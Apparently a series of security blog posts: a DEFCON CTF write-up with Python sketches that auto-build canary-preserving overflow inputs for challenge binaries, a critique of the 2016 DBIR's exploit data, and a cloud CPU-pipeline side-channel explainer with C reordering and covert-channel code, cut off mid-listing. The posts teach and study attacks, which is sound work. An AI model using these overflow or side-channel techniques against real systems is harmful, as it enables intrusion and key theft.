2000 cuts with Binary Ninja

Using Vector35’s Binary Ninja, a promising new interactive static analysis and reverse engineering platform, I wrote a script that generated “exploits” for 2,000 unique binaries in this year’s DEFCON CTF qualifying round.

If you’re wondering how to remain competitive in a post-DARPA DEFCON CTF, I highly recommend you take a look at Binary Ninja.

Before I share how I slashed through the three challenges — 334 cuts, 666 cuts, and 1,000 cuts — I have to acknowledge the tool that made my work possible.

Compared to my experience with IDA, which is held together with duct tape and prayers, Binary Ninja’s workflow is a pleasure. It does analysis on its own intermediate language (IL), which is exposed through Python and C++ APIs. It’s comparatively simple to query blocks of code and functions, trace execution flow, inspect register states, and perform many other tasks that seem herculean within IDA.

This brought a welcome distraction from the slew of stack-based buffer overflows and unhardened heap exploitation that have come to characterize DEFCON’s CTF.

Since the original point of CTF competitions was to help people improve, I limited my options to what most participants could use. Without Binary Ninja, I would have had to:

  1. Use IDA and IDAPython, a more expensive and unpleasant proposition.
  2. Develop a Cyber Reasoning System, an unrealistic option for most participants.
  3. Reverse the binaries by hand, effectively impossible given the number of binaries.

None of these are nearly as attractive as Binary Ninja.

How Binary Ninja accelerates CTF work

This year’s qualifying challenges were heavily focused on preparing competitors for the Cyber Grand Challenge (CGC). A full third of the challenges were DECREE-based. Several required CGC-style “Proof of Vulnerability” exploits. This year the finals will be based on DECREE, so the winning CGC robot can ‘play’ against the human competitors. For the first time in its history, DEFCON CTF is abandoning the attack-defense model.

Challenge #1 : 334 cuts

334 cuts

The first challenge, 334 cuts, didn’t offer much in terms of direction. I started by connecting to the challenge service:

$ nc 334_cuts_22ffeb97cf4f6ddb1802bf64c03e2aab.quals.shallweplayaga.me 10334
send your crash string as base64, followed by a newline

Okay, so it wants us to crash the service. No problem: I already had a crashing input string for that service from a previous challenge.

$ nc 334_cuts_22ffeb97cf4f6ddb1802bf64c03e2aab.quals.shallweplayaga.me 10334
send your crash string as base64, followed by a newline

I wasn’t expecting a second challenge name after the first. I’m guessing I’m going to need to crash a few services now. Next I extracted the tarball.

$ tar jxf 334_cuts.tar.bz2
$ ls 334_cuts
$ ls 334_cuts | wc -l

Hmm, there are 334 DECREE challenge binaries, all with food-related names. Well, time to throw them into Binja, starting with easy-biroldo-with-mayonnaise-on-multigrain. DECREE challenge binaries are secretly ELF binaries (as used on Linux and FreeBSD), so they load just fine with Binja’s ELF loader.


Binary Ninja has a simple and smooth interface

This challenge binary is fairly simple and nearly identical to easy-prasky-with-buffalo-on-bing. Each challenge binary is stripped of symbols, has a static stack buffer, a canary, and a stack-based buffer overflow. The canary is copied to the stack and checked against a hard-coded value. If the canary is overwritten, the challenge terminates and does not crash, so any overflow has to overwrite the canary with the expected value. It turns out all 334 challenges differ in only four ways:

  1. The size of the buffer you overflow
  2. The canary string and its length
  3. The size of the stack buffer in the recvmsg function
  4. The amount of data the writemsg function processes for each iteration of its write loop

Our crashing string has to both exactly overflow the stack buffer and pass the canary check in each of the 334 binaries. It’s best to automate collecting this information; thankfully, Binja can be used as a headless analysis engine from Python!

We start by importing Binja into our Python script and creating a binary view. The binary view is our main interface to Binja’s analysis.

I was initially trying to create a generic solution without looking at the majority of the challenge binaries, so I found the main function programmatically. Starting from the entry point, I knew there were two calls, with the second being the one I wanted. Similarly, I knew the next function had one call, and that call was the one I wanted to follow to main. All my analysis used Binja’s LowLevelIL.
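A minimal headless sketch of that setup and walk, assuming Binary Ninja’s Python API is installed. The names below (BinaryViewType, LowLevelILOperation, get_function_at taking a platform) follow the 2016-era API and may differ in current releases; the imports are deferred so the sketch reads without the API present.

```python
def load_view(path):
    import binaryninja  # deferred: requires a Binary Ninja install
    bv = binaryninja.BinaryViewType["ELF"].open(path)
    bv.update_analysis_and_wait()  # block until analysis settles
    return bv

def find_main(bv):
    from binaryninja import LowLevelILOperation

    def call_sites(func):
        # all LLIL_CALL instructions in a function, in program order
        return [insn for block in func.low_level_il for insn in block
                if insn.operation == LowLevelILOperation.LLIL_CALL]

    # the entry point makes two calls; follow the second...
    entry = bv.get_function_at(bv.platform, bv.entry_point)
    nxt = bv.get_function_at(bv.platform, call_sites(entry)[1].dest.value)
    # ...and that function makes one call, which leads to main
    return bv.get_function_at(bv.platform, call_sites(nxt)[0].dest.value)
```

The same call_sites() helper is reused later to locate the memcpy, recvmsg, and memcmp call sites inside main.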

Once we have our reference to main, the real fun begins.


Binary Ninja in LowLevelIL mode

The first thing we needed to figure out was the canary string. The approach I took was to collect references to all the call instructions:

Then I knew that the first call was to a memcpy, the second was to recvmsg, and the third was to the canary memcmp. One small hiccup: sometimes the compiler would inline the memcpy. This happened when the canary string was less than 16 bytes long.


This Challenge Binary has an inline memcpy.😦

This was a simple fix, as I now counted the number of calls in the function and adjusted my offsets accordingly:

To extract the canary and the size of the canary buffer, I used the newly introduced get_parameter_at() function. This function is fantastic: at any call site, it allows you to query the function parameters with respect to calling convention and system architecture. I used it to query all the parameters of the call to memcmp.

Next I needed to know how big the buffer to overflow was. To do this, I once again used get_parameter_at() to query the first argument of the read_buf call, which points to the stack buffer we’ll overflow. We can calculate its size by subtracting the buffer’s offset from that of the canary’s stack buffer.
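Put together, the extraction might look like the sketch below. The call-site addresses (memcmp_site, read_buf_site) stand in for the ones collected from the call list earlier, and the get_parameter_at() signature follows the 2016-era API; it has shifted across releases.

```python
def overflow_params(bv, main, memcmp_site, read_buf_site):
    # memcmp(stack_canary_copy, expected_canary, length)
    canary_ptr = main.get_parameter_at(bv.arch, memcmp_site, None, 0)
    expected   = main.get_parameter_at(bv.arch, memcmp_site, None, 1)
    canary_len = main.get_parameter_at(bv.arch, memcmp_site, None, 2)

    # read the expected canary bytes out of the binary itself
    canary = bv.read(expected.value, canary_len.value)

    # read_buf's first argument points at the buffer we overflow;
    # both pointers are stack offsets, so their distance is the padding
    buf_ptr = main.get_parameter_at(bv.arch, read_buf_site, None, 0)
    pad_len = canary_ptr.value - buf_ptr.value
    return pad_len, canary
```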

It turns out the other two variables were inconsequential. These two bits of information were all we needed to craft our crashing string.
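Crafting the string itself is then pure Python: pad up to the canary, rewrite the canary with its expected value, and keep writing past it to cause the crash. The trailing byte count here is a guess for illustration; the exact amount doesn’t matter as long as it reaches something that faults.

```python
import base64

def make_crash_string(pad_len, canary, tail=16):
    # pad to the canary, keep the canary intact, then smash past it
    payload = b"A" * pad_len + canary + b"B" * tail
    return base64.b64encode(payload) + b"\n"

# e.g. a 4-byte buffer guarded by the (hypothetical) canary b"GUARD"
line = make_crash_string(4, b"GUARD")
assert base64.b64decode(line) == b"AAAA" + b"GUARD" + b"B" * 16
```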

I glued all this logic together and threw it at the 334 cuts service. It prompted me for 10 crashing strings before giving me the flag: baby's first crs cirvyudta.
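The glue around it is ordinary socket code. A hedged sketch: solve_binary stands in for the Binary Ninja analysis above, and the protocol framing (banner, then one challenge name per round) is reconstructed from the transcripts.

```python
import base64
import socket

def play(host, port, solve_binary, rounds=10):
    # solve_binary(name) -> raw crashing bytes for that challenge binary
    sock = socket.create_connection((host, port))
    f = sock.makefile("rwb")
    print(f.readline().decode().strip())      # banner
    for _ in range(rounds):
        name = f.readline().decode().strip()  # challenge binary to crash
        f.write(base64.b64encode(solve_binary(name)) + b"\n")
        f.flush()
    print(f.readline().decode().strip())      # hopefully the flag
```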

Challenge #2: 666 cuts

666 cuts

To start, I once again connected with netcat:

$ nc 666_cuts_e38431570c1b4b397fa1026bb71a0576.quals.shallweplayaga.me 10666
send your crash string as base64, followed by a newline

I’m expecting 666 challenge binaries.

$ tar jxf 666_cuts.tar.bz2
$ ls 666_cuts
$ ls 666_cuts | wc -l

Same game as before: I throw a random binary into Binja and it’s nearly identical to the set from 334 cuts. At this point I wonder if the same script will work for this challenge. I modify it to connect to the new service and run it. The new service provides 10 challenge binary names to crash and my script provides 10 crashing strings before printing the flag: you think this is the real quaid DeifCokIj.

Challenge #3: 1000 cuts

1000 cuts

You get the idea, 1000 challenges, same script, flag is: do you want a thousand bandages gruanfir3.

Room For Improvement

Binary Ninja shows a lot of promise, but it still has a ways to go. In future versions I hope to see the addition of SSA and a flexible type system. Once SSA is added to Binary Ninja, it will be easier to identify data flows through the application, tell when types change, and determine when stack slots are reused. It’s also a foundational feature that helps build a decompiler.


From its silky smooth graph view to its intermediate language to its smart integration with Python, Binary Ninja provides a fantastic interface for static binary analysis. With minimal effort, it allowed me to extract data from 2,000 binaries quickly and easily.

That’s the bigger story here: It’s possible to enhance our capabilities and combine mechanical efficiency with human intuition. In fact, I’d say it’s preferable. We’re not going to become more secure if we rely on machines entirely. Instead, we should focus on building tools that make us more effective; tools like Binary Ninja.

If you agree, give Binary Ninja a chance. In less than a year of development, it’s already punching above its weight class. Expect more fanboyism from myself and the rest of Trail of Bits — especially as Binary Ninja continues to improve.

My (slightly updated) script is available here. For the sake of history, the original is available here.

Binary Ninja is currently in a private beta and has a public Slack.

The DBIR’s ‘Forest’ of Exploit Signatures

If you follow the recommendations in the 2016 Verizon Data Breach Investigations Report (DBIR), you will expose your organization to more risk, not less. The report’s most glaring flaw is the assertion that the TLS FREAK vulnerability is among the ‘Top 10’ most exploited on the Internet. No experienced security practitioner believes that FREAK is widely exploited. Where else did Verizon get it wrong?

This question undermines the rest of the report. The DBIR is a collaborative effort involving 60+ organizations’ proprietary data. It’s the single best source of information for enterprise defenders, which is why it’s a travesty that its section on vulnerabilities used in data breaches contains misleading data, analysis, and recommendations.

Verizon must ‘be better.’ They have to set a higher standard for the data they accept from collaborators. I recommend they base their analysis on documented data breaches, partner with agent-based security vendors, and include a red team in the review process. I’ll elaborate on these points later.

Digging into the vulnerability data

For the rest of this post, I’ll focus on the DBIR’s Vulnerability section (pages 13-16). There, Verizon uses bad data to discuss trends in software exploits used in data breaches. This section was contributed by Kenna Security (formerly Risk I/O), a vulnerability management startup with $10 million in venture funding. Unlike the rest of the report, nothing in this section is based on data breaches.


The Kenna Security website claims they authored the Vulnerabilities section in the 2016 DBIR

It’s easy to criticize the analysis in the Vulnerabilities section. It repeats common tropes long attacked by the security community, like simple counting of known vulnerabilities (Figures 11, 12, and 13). Counting vulnerabilities fails to consider the number of assets, their importance to the business, or their impact. There’s something wrong with the underlying data, too.

Verizon notes in the section’s header that portions of the data come from vulnerability scanners. In footnote 8, they share some of the underlying data, a list of the top 10 exploited vulnerabilities as detected by Kenna. According to the report, these vulnerabilities represent 85% of successful exploit traffic on the Internet.


Footnote 8 lists the vulnerabilities most commonly used in data breaches

Jericho at OSVDB was the first to pick apart this list of CVEs. He noted that the DBIR never explains how successful exploitation is detected (their subsequent clarification doesn’t hold water), nor what successful exploitation means in the context of a vulnerability scanner. Worse, he points out that among the ‘top 10’ are obscure local privilege escalations, denial of service flaws for Windows 95, and seemingly arbitrary CVEs from Oracle CPUs.

Rory McCune at NCC was the second to note discrepancies in the top ten list. Rory zeroed in on the fact that one of Kenna’s top 10 was the FREAK TLS flaw, which requires a network man-in-the-middle position, a vulnerable server, and a vulnerable client, plus substantial computational power to pull it off at scale. Additionally, successful exploitation produces no easily identifiable network signature. In the face of all this evidence against the widespread exploitation of FREAK, Kenna’s extraordinary claims require extraordinary evidence.

When questioned about similar errors in the 2015 DBIR, Kenna’s Chief Data Scientist Michael Rohytman explained, “the dataset is based on the correlation of ids exploit signatures with open vulns.” Rohytman later noted that disagreements about the data likely stem from differing opinions about the meaning of “successful exploitation.”

These statements show that the vulnerability data is unlike all other data used in the DBIR. Rather than the result of a confirmed data breach, the “successful exploit traffic” of these “mega-vulns” was synthesized by correlating vulnerability scanner output with intrusion detection system (IDS) alerts. The result of this correlation does not describe the frequency nor tactics of real exploits used in the wild.

Obfuscating with fake science

Faced with a growing chorus of criticism, Verizon and Kenna published a blog post that ignores critics, attempts to obfuscate their analysis with appeals to authority, substitutes jargon for a counterargument, and reiterates dangerous enterprise security policies from the report.


Kenna’s blog post begins with appeals to authority and ad hominem attacks on critics

The first half of the Kenna blog post moves the goalposts. They present a new top ten list that, in many ways, is even more disconnected from data breaches than the original. Four of the ten are now Denial of Service (DoS) flaws which do not permit unauthorized access to data. Two more are FREAK which, if successfully exploited, only permit access to HTTPS traffic. Three are 15-year-old UPnP exploits that only affect Windows XP SP0 and lower. The final exploit is Heartbleed which, despite potentially devastating impact, can be traced to few confirmed data breaches since its discovery.

Kenna’s post does answer critics’ calls for the methodology used to define a ‘successful exploitation’: an “event” where 1) a scanner detects an open vulnerability, 2) an IDS triggers on that vulnerability, and 3) one or more post-exploitation indicators of compromise (IOCs) are triggered, presumably all on the same host. This approach fails to account for the biggest challenge with security products: false positives.


Kenna is using a synthetic benchmark for successful exploitation based on IDS signatures
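A toy back-of-envelope (with invented rates, not Kenna’s data) shows why ignoring false positives matters: tiny per-host false-positive rates, multiplied across millions of hosts, still produce a flood of phantom “successful exploitations”.

```python
# All rates below are invented for illustration only.
hosts = 10_000_000    # hosts visible across all contributing customers
scanner_fp = 0.02     # scanner wrongly reports the vulnerability "open"
ids_fp = 0.01         # IDS signature fires on benign traffic
ioc_fp = 0.05         # an unrelated "post-exploitation" IOC also fires

# If the three detections are just independent noise, the expected
# number of hosts that pass all three checks with no real exploitation:
phantom = hosts * scanner_fp * ids_fp * ioc_fp  # ~100 per scan pass
```

And every repeated benign scan of those hosts multiplies the count again, which is exactly how obscure signatures can climb into a “top ten”.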

Flaws in the data

As mentioned earlier, the TLS FREAK vulnerability is the most prominent error in the DBIR’s Vulnerabilities section. FREAK requires special access as a network Man-in-the-Middle (MITM). Successful exploitation only downgrades the protections from TLS. An attacker would then have to factor a 512-bit RSA modulus to decrypt the session data, an attack that cost US$75 per session around the time the report was in production. After decrypting the result, they’d just have a chat log; no access to either the client or the server devices. Given all this effort, the low pay-off, and the comparative ease and promise of other exploits, it’s impossible that the TLS FREAK flaw would have been one of the ten most exploited vulnerabilities in 2015.

The rest of the section’s data is based on correlations between intrusion detection systems and vulnerability scanners. This approach yields questionable results.

All available evidence (threat intel reports, the Microsoft SIR, etc.) show that real attacks occur on the client side: Office, PDF, Flash, Browsers, etc. These vulnerabilities, which figure so prominently in Microsoft data and DFIR reports about APTs, don’t appear in the DBIR. How come exploit kits and APTs are using Flash as a vector, yet Kenna’s top 10 fails to list a single Flash vulnerability? Because, by and large, these sorts of attacks are not visible to IDS nor vulnerability scanners. Kenna’s data comes from sources that cannot see the actual attacks.

Intrusion detection systems are designed to inspect traffic and apply a database of known signatures to the specific protocol fields. If a match appears, most products will emit an alert and move on to the next packet. This “first exit” mode helps with performance, but it can lead to attack shadowing, where the first signature to match the traffic generates the only alert. This problem gets worse when the first signature to match is a false positive.

The SNMP vulnerabilities reported by Kenna (CVE-2002-0012, CVE-2002-0013) highlight the problem of relying on IDS data. The IDS signatures for these vulnerabilities are often triggered by benign security scans and network discovery tools. It is highly unlikely that a 14-year-old DoS attack would be one of the most exploited vulnerabilities across corporate networks.

Vulnerability scanners are notorious for false positives. These products often depend on credentials to gather system information, but fall back to less-reliable testing methods as a last resort. The UPnP issues reported by Kenna (CVE-2001-0877, CVE-2001-0876) are false positives from vulnerability scanning data. Similar to the SNMP issues, these vulnerabilities are often flagged on systems that are not Windows 98, ME, or XP, and are considered line noise by those familiar with vulnerability scanner output.

It’s unclear how the final step of Kenna’s three-step algorithm, detection of post-exploitation IOCs, supports correlation. In the republished top ten list, four of the vulnerabilities are DoS flaws and two enable HTTPS downgrades. What is a post-exploitation IOC for a DoS? In all of the cases listed, the target host would crash, stop receiving further traffic, and likely reboot. It’s more accurate to interpret post-exploitation IOCs to mean, “more than one IDS signature was triggered.”

The simplest explanation for Kenna’s results? A serious error in the correlation methodology.

Issues with the methodology

Kenna claims to have 200+ million successful exploit events in their dataset. In nearly all the cases we know about, attackers use very few exploits. Duqu duped Kaspersky with just two exploits. Phineas Phisher hacked Hacking Team with just one exploit. Stuxnet stuck with four exploits. The list goes on. There are not 50+ million breaches in a year. This is a sign of poor data quality. Working back from the three-step algorithm described earlier, I conclude that Kenna counted IDS signatures fired, not successful exploit events.

There are some significant limitations to relying on data collected from scanners and IDS. Of the thousands of companies that employ these devices (and who share the resulting data with Kenna), a marginal number go through the effort of configuring their systems properly. Without this configuration, the resulting data is a useless cacophony of false positives. Aggregating thousands of customers’ noisy datasets is no way to tune into a meaningful signal. But that’s precisely what Kenna asks the DBIR’s readers to accept as the basis for the Vulnerabilities section.

Let’s remember the hundreds of companies, public initiatives, and bots scanning the Internet. Take the University of Michigan’s Scans.io as one example. They scan the entire Internet dozens of times per day. Many of these scans would trigger Kenna’s three-part test to detect a successful exploit. Weighting the results by the number of times an IDS event triggers yields a disproportionate number of events. If the results aren’t normalized for another factor, the large numbers will skew results and insights.


Kenna weighted their results by the number of IDS events

Finally, there’s the issue of enterprises running honeypots. A honeypot responds positively to any attempt to hack into it. This would also “correlate” with Kenna’s three-part algorithm. There’s no indication that such systems were removed from the DBIR’s dataset.

In the course of performing research, scientists frequently build models of how they think the real world operates, then back-test them with empirical data. High-quality sources of empirical exploit incidence data are available from US-CERT, which coordinates security incidents for all US government agencies, and Microsoft, which has unique data sources like Windows Defender and crash reports from millions of PCs. From their reports, only the Heartbleed vulnerability appears in Kenna’s list. The rest of the data and recommendations from US-CERT and Microsoft match. Neither of them agree with Kenna.

Ignore the DBIR’s vulnerability recommendations

“This is absolutely indispensable when we defenders are working together against a sentient attacker.” — Kenna Security

Even if you take the DBIR’s vulnerability analysis at face value, there’s no basis for assuming human attackers behave like bots. Scan and IDS data does not correlate to what real attackers would do. The only way to determine what attackers truly do is to study real attacks.



Kenna Security advocates a dangerous patch strategy based on faulty assumptions

Empirical data disagrees with this approach. Whenever new exploits and vulnerabilities come out, attacks spike. This misguided recommendation has the potential to cause real, preventable harm. In fact, the Vulnerabilities section of the DBIR both advocates this position and then refutes it only one page later.


The DBIR presents faulty information on page 13…


… then directly contradicts itself only one page later

Recommendations from this section fall victim to many of the same criticisms of pure vulnerability counting: they fail to consider the number of assets, their criticality, the impact of vulnerabilities, and how they are used by real attackers. Without acknowledging the source of the data, Verizon and Kenna walk the reader down a dangerous path.

Improvements for the 2017 DBIR

“It would be a shame if we lost the forest for the exploit signatures.”
— Michael Rohytman, Chief Data Scientist, Kenna

This closing remark from Kenna’s rebuttal encapsulates the issue: exploit signatures were used in lieu of data from real attacks. They skipped important steps while collecting data over the past year, jumped to assumptions based on scanners and IDS devices, and appeared to hope that their conclusions would align with what security professionals see on the ground. Above all, this incident demonstrates the folly of applying data science without sufficient input from practitioners. The resulting analysis and recommendations should not be taken seriously.

Kenna’s 2015 contribution to the DBIR received similar criticism, but they didn’t change for 2016. Instead, Verizon expanded the Vulnerability section and used it for the basis of recommendations. It’s alarming that Verizon and Kenna aren’t applying critical thinking to their own performance. They need to be more ambitious with how they collect and analyze their data.

Here’s how the Verizon 2017 DBIR could improve on its vulnerability reporting:

  1. Collect exploit data from confirmed data breaches. This is the basis for the rest of the DBIR’s data. Their analysis of exploits should be just as rigorous. Contrary to what I was told on Twitter, there is enough data to achieve statistical relevance. With the 2017 report a year away, there’s enough time to correct the processes of collecting and analyzing exploit data. Information about vulnerability scans and IDS signatures doesn’t serve the information security community, nor their customers.
  2. That said, if Verizon wants to take more time to refine the quality of the data they receive from their partners, why not partner with agent-based security vendors in the meantime? Host-based collection is far closer to exploits than network data. CrowdStrike, FireEye, Bit9, Novetta, Symantec, and more all have agents on hosts that can detect successful exploitation based on process execution and memory inspection, far more reliable factors.
  3. Finally, include a red team in the review process of future reports. It wasn’t until the 2014 DBIR that attackers’ patterns were separated into nine categories, a practice that practitioners had developed years earlier. That technique would have been readily available if the team behind the DBIR had spoken to practitioners who understand how to break and defend systems. Involving a red team in the review process would strengthen the report’s conclusions and recommendations.

Be better

For the 2016 DBIR, Verizon accepted a huge amount of low-quality data from a vendor. They reprinted the analysis verbatim. Clearly, no one who understands vulnerabilities was involved in the review process. The DBIR team tossed in some data-science vocab for credibility, and a few distracting jokes, and asked for readers’ trust.

Worse, Verizon stands behind the report, rather than acknowledge and correct the errors.

Professionals and businesses around the world depend on this report to make important security decisions. It’s up to Verizon to remain the dependable source for our industry.

I’d like to thank HD Moore, Thomas Ptacek, Grugq, Dan Rosenberg, Mike Russell, Kelly Shortridge, Rafael Turner, the entire team at Trail of Bits, and many others that cannot be cited for their contributions and comments on this blog post.


Rory McCune has posted a followup where he notes a huge spike in Kenna’s observed exploitation of FREAK occurs at exactly the same time that the University of Michigan was scanning the entire internet for it. This supports the theory that benign internet-wide scans made it into Kenna’s data set where they were scaled by their frequency of occurrence.


Kenna’s data on FREAK overlaps precisely with internet-wide scans from the University of Michigan

Further, an author of FREAK has publicly disclaimed any notion that it was widely exploited.


Rob Graham has pointed out that typical IDS signatures for FREAK do not detect attacks but rather only detect TLS clients that offer weak cipher suites. This supports the theory that the underlying data was not inspected nor were practitioners consulted prior to using this data in the DBIR.


Justin Kennedy has shared exploit data from five years of penetration tests conducted against his clients and noted that FREAK and Denial of Service attacks never once assisted compromising a target. This supports the theory that exploitation data in the DBIR distorts the view on the ground.


Threatbutt has immortalized this episode with the release of their Danger Zone Incident Retort (DZIR).


Karim Toubba, Kenna Security CEO, has posted a mea culpa on their blog. He notes that they did not confirm any of their analysis with their own product before delivering it to Verizon for inclusion in the DBIR.

What is the point of Kenna's contribution if it was not backed by their insights?

Kenna’s contribution to the DBIR was not validated by their own product

Further, Karim notes that their platform ranks FREAK as a “25 out of 100”; however, even this ranking is orders of magnitude too high based on the available evidence. This raises the question of whether the problems exposed in Kenna’s analysis in the DBIR extend into their product as well.


Kenna’s product prioritizes FREAK an order of magnitude higher than it likely should be

Finally, I consider the criticisms in this blog post applicable to their entire contribution to the DBIR and not only their “top ten successfully exploited vulnerabilities” list. Attempts to pigeonhole this criticism to the top ten miss the fact that other sections of the report are based on the same or similar data from Kenna.


Verizon published their own mea culpa.


Software Security Ideas Ahead of Their Time

Every good security researcher has a well-curated list of blogs they subscribe to. At Trail of Bits, given our interest in software security and its intersections with programming languages, one of our favorites is The Programming Language Enthusiast by Michael Hicks.

Our primary activity is to describe and discuss research about — and the practical development and use of — programming languages and programming tools (PLPT). PLPT is a core area of computer science that bridges high-level algorithms/designs and their executable implementations. It is a field that has deep roots in mathematical logic and the theory of computation but also produces practical compilers and analysis tools.

Andrew Ruef, one of our employees and a PhD student at UMD, has written a guest blog post for the PL Enthusiast on the topic of software security ideas that were ahead of their time.

As researchers, we are often asked to look into a crystal ball. We try to anticipate future problems so that work we begin now will address problems before they become acute. Sometimes, a researcher foresees a problem and its possible solution, but chooses not to pursue it. In a sense, she has found, and discarded, an idea ahead of its time.

Recently, a friend of Andrew’s pointed him to a 20-year-old email exchange on the “firewalls” mailing list that blithely suggests, and discards, problems and solutions that are now quite relevant, and on the cutting edge of software security research. The situation is both entertaining and instructive, especially in that the ideas are quite squarely in the domain of programming languages research, but were not considered by PL researchers at the time (as far as we know).

Read on for a deep dive into the firewalls listserv from 1995, prior to the publication of Smashing the Stack for Fun and Profit, as a few casual observers correctly anticipate the next 20 years of software security researchers.

If you enjoyed Andrew’s post on the PL Enthusiast, we recommend a few others that touch upon software security:

Hardware Side Channels in the Cloud

At REcon 2015, I demonstrated a new hardware side channel which targets co-located virtual machines in the cloud. This attack exploits the CPU’s pipeline, as opposed to the cache tiers often used in side channel attacks. When designing or looking for hardware-based side channels, specifically in the cloud, I analyzed a few universal properties which define the ‘right’ kind of vulnerable system, as well as unique ones tailored to the hardware medium.

Slides and full research paper found here.

The relevance of side channel attacks will only increase, especially attacks that target the vulnerabilities inherent to systems that share hardware resources, such as cloud platforms.

Virtualization of Physical Resources

Figure 1: virtualization of physical resources


Any meaningful information that you can leak from the environment running the target application (or, in this case, the victim virtual machine) counts as a side channel. However, some information is better than others. In this case, a process (the attacker) must be able to repeatedly record an environment ‘artifact’ from inside one virtual machine.

In the cloud, these environment artifacts are the shared physical resources used by the virtual machines. The hypervisor dynamically partitions each resource and this is then seen by a single virtual machine as its private resource. The side channel model (Figure 2) illustrates this.

Knowing this, the attacker can affect that resource partition in a recordable way, such as by flushing a line in the cache tier, waiting until the victim process uses it for an operation, then requesting that address again – recording what values are now there.

Figure 2: Side Channel Model

Figure 2: side channel model


Great! So we can record things from our victim’s environment – but now what? Depending on what the victim’s process is doing we can actually employ several different types of attacks.

1. crypto key theft

Crypto keys are great, private crypto keys are even better. Using this hardware side channel, it’s possible to leak the bytes of the private key used by a co-located process. In one scenario, two virtual machines are allocated the same space on the L3 cache at different times. The attacker flushes a certain cache address, waits for the victim to use that address, then queries it again – recording the new values that are there [1].

2. process monitoring ( what applications is the victim running? )

This is possible when you record enough of the target’s behavior, e.g. CPU or pipeline usage or values stored in memory. A mapping from the recording to a specific running process can then be constructed with varying degrees of certainty. Fair warning: this does rely on at least a rudimentary knowledge of machine learning.

3. environment keying ( great for proving co-location! )

Using the environment recordings taken off of a specific hardware resource, you can also uniquely identify one server from another in the cloud. This is useful to prove that two virtual machines you control are co-resident on the same physical server. Alternatively, if you know the behavior signature of a server your target is on, you can repeatedly create virtual machines, recording the behavior on each system until you find a match [2].

4. broadcast signal ( receive messages without the internet :0 )

If a colluding process purposefully generates behavior on a pre-arranged hardware resource, such as filling a cache line with 0’s and 1’s, the attacker (your process) can record this behavior the same way it would record a victim’s behavior. You can then translate the recorded values into pre-agreed messages. Recording from different hardware mediums yields channels with different bandwidths [3].

The Cache is Easy, the Pipeline is Harder

All of the above examples used the cache to record the environment shared by the victim and attacker processes. The cache is the most widely used resource for constructing side channels, in both literature and practice, and it is the easiest to record artifacts from. Basically, everyone loves cache.

The cache isn’t the only shared resource: co-located virtual machines also share the CPU execution pipeline. In order to use the CPU pipeline, we must be able to record a value from it. However, there is no easy way for a process to query the state of the pipeline over time – it is a virtual black box. The only things a process can know are the order of the instructions it submits for execution and the results the pipeline returns.

out-of-order execution

( the pipeline’s artifact )

We can exploit this pipeline optimization as a means to record the state of the pipeline. A known input instruction order can produce one of two results: the expected result, or the result of the pipeline executing the instructions out of order.

Figure 3: Foreign Processes Can Share the Same Pipeline


strong memory ordering

Our target, cloud processors, can be assumed to be of x86/64 architecture, implying a (usually) strongly-ordered memory model [4]. This is important because the pipeline will optimize the execution of instructions while attempting to maintain the correct order of stores to and loads from memory.

…HOWEVER, the stores and loads from different threads may be reordered by out-of-order execution. This reordering is observable if we’re clever.

recording instruction reorder ( or how to be clever )

In order for the attacker to record the “reordering” artifact from the pipeline, we must record two things for each of our two threads:

  • input instruction order
  • return value

Additionally, the instructions in each thread must contain a STORE to memory and a LOAD from memory. The LOAD from memory must reference the location stored to by the opposite thread. This setup ensures the possibility for the four cases illustrated below. The last is the artifact we record – doing so several thousand times gives us averages over time.

Figure 4: the attacker can record when its instructions are reordered

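The setup above maps directly onto the classic store-buffering litmus test. Below is a portable C sketch using pthreads and C11 relaxed atomics rather than raw assembly; all names are illustrative, and a real recorder would synchronize the two threads tightly (e.g. with a spin barrier) to observe far more reorders than this simple version does:

```c
// Store-buffering litmus test: each thread STOREs to its own flag and
// LOADs the other thread's flag. If both threads read 0, the store/load
// pairs were observed out of program order -- the recordable artifact.
#include <pthread.h>
#include <stdatomic.h>

static atomic_int X, Y;    // the two memory locations
static atomic_int r1, r2;  // each thread's observed LOAD result

static void *thread_a(void *arg) {
    (void)arg;
    atomic_store_explicit(&X, 1, memory_order_relaxed);  // STORE X
    atomic_store_explicit(&r1,
        atomic_load_explicit(&Y, memory_order_relaxed),  // LOAD  Y
        memory_order_relaxed);
    return 0;
}

static void *thread_b(void *arg) {
    (void)arg;
    atomic_store_explicit(&Y, 1, memory_order_relaxed);  // STORE Y
    atomic_store_explicit(&r2,
        atomic_load_explicit(&X, memory_order_relaxed),  // LOAD  X
        memory_order_relaxed);
    return 0;
}

// Run `trials` rounds; count how often both LOADs saw 0, i.e. how often
// the reordering artifact was observed (the last of the four cases).
int count_reorders(int trials) {
    int reorders = 0;
    for (int i = 0; i < trials; i++) {
        atomic_store(&X, 0);
        atomic_store(&Y, 0);
        pthread_t a, b;
        pthread_create(&a, 0, thread_a, 0);
        pthread_create(&b, 0, thread_b, 0);
        pthread_join(a, 0);
        pthread_join(b, 0);
        if (atomic_load(&r1) == 0 && atomic_load(&r2) == 0)
            reorders++;
    }
    return reorders;
}
```

Averaging the reorder count over several thousand trials gives the baseline that the later attacks modulate.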

sending a message

To make our attacks more interesting, we want to be able to force the number of recorded out-of-order executions. This ability is useful for other attacks, such as constructing covert communication channels.

In order to do this, we need to alter how the pipeline’s optimization works, increasing the probability that it will or will not reorder our two threads. The easiest approach is to enforce a strong memory order, guaranteeing that the attacker will observe fewer out-of-order executions.

memory barriers

In the x86 instruction set, there are specific barrier instructions that stop the processor from reordering the four possible combinations of STOREs and LOADs. We’re interested in forcing a strong order when the processor encounters an instruction sequence with a STORE followed by a LOAD.

The instruction mfence does exactly this.

By having the colluding process inject these memory barriers into the pipeline, the attacker’s instructions will not be reordered, forcing a noticeable decrease in the recorded averages. Doing this in distinct time frames allows us to send a binary message.

Figure 5: mfence ensures the strong memory order on pipeline

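As a sketch of the barrier’s effect, the store-buffering test can be rerun with a full fence between each STORE and LOAD; `atomic_thread_fence(memory_order_seq_cst)` compiles to `mfence` on x86. For a self-contained demo both threads are fenced, which rules out the reordered outcome entirely rather than merely lowering its frequency as the colluding-process scheme does; all names here are illustrative:

```c
// Store-buffering test with a full fence (mfence on x86) between each
// STORE and LOAD. The fence forbids store->load reordering, so the
// "both loads read 0" artifact can no longer occur.
#include <pthread.h>
#include <stdatomic.h>

static atomic_int X, Y, r1, r2;

static void *fenced_a(void *arg) {
    (void)arg;
    atomic_store_explicit(&X, 1, memory_order_relaxed);  // STORE X
    atomic_thread_fence(memory_order_seq_cst);           // mfence on x86
    atomic_store_explicit(&r1,
        atomic_load_explicit(&Y, memory_order_relaxed),  // LOAD  Y
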